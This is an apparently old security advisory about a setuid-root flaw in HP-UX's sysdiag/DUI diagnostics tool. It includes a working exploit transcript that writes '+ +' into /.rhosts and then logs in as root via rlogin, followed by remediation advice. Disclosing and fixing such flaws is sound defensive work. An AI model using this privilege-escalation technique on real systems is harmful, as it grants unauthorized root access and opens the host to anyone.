COMMAND
/usr/diag/bin/DUI (called by /bin/sysdiag)
SYSTEMS AFFECTED
HP-UX all versions
PROBLEM
The sysdiag program is the interface to the online diagnostics
subsystem. When started, this program runs /usr/diag/bin/DUI
which is suid root. Here is the example (well, exploit) for
.rhosts file (+ +)
(tested on hp720/9000, DUI ver.A.02.18)
$ ls -al /bin/sysdiag
-r-sr-xr-x 1 0 bin 18 Nov 30 1992 /bin/sysdiag
$ /bin/sysdiag
*****************************************************************
****** ******
****** ONLINE DIAGNOSTIC SYSTEM ******
****** ******
****** (C) Copyright Hewlett Packard Co. 1987, 1989, 1990 ******
****** All Rights Reserved ******
****** ******
****** DUI Version A.02.18 ******
****** Diagnostic Monitor Version A.02.19 ******
****** ******
*****************************************************************
Type "HELP" for assistance.
DUI >outfile /.rhosts
DUI >+ +
^
*** SYNTAX ERROR (DUISERR 501)
DUI >redo
+ +
(press enter)
DUI >+ +
^
*** SYNTAX ERROR (DUISERR 501)
DUI >exit
$ ls -al /.rhosts
-rwxr-xr-x 1 0 users 891 Nov 17 04:25 /.rhosts
$ rlogin localhost -l root
#
ps. the error message " ^ "
*** SYNTAX ERROR (DUISERR 501)
is show in screen after keyin command.
SOLUTION
If you do not need to do system diagnostics, you should remove
this whole package. The package includes all the files in
/usr/diag/bin and the file /bin/sysdiag. If you need to keep this
package, you should change the permissions on all the files in
/usr/diag/bin and the file /bin/sysdiag to owner only access and
clear the suid bit. Check that all the files are owned by root.
Normal users will no longer be able to use sysdiag but the system
manager will be able to do so when logged in as root.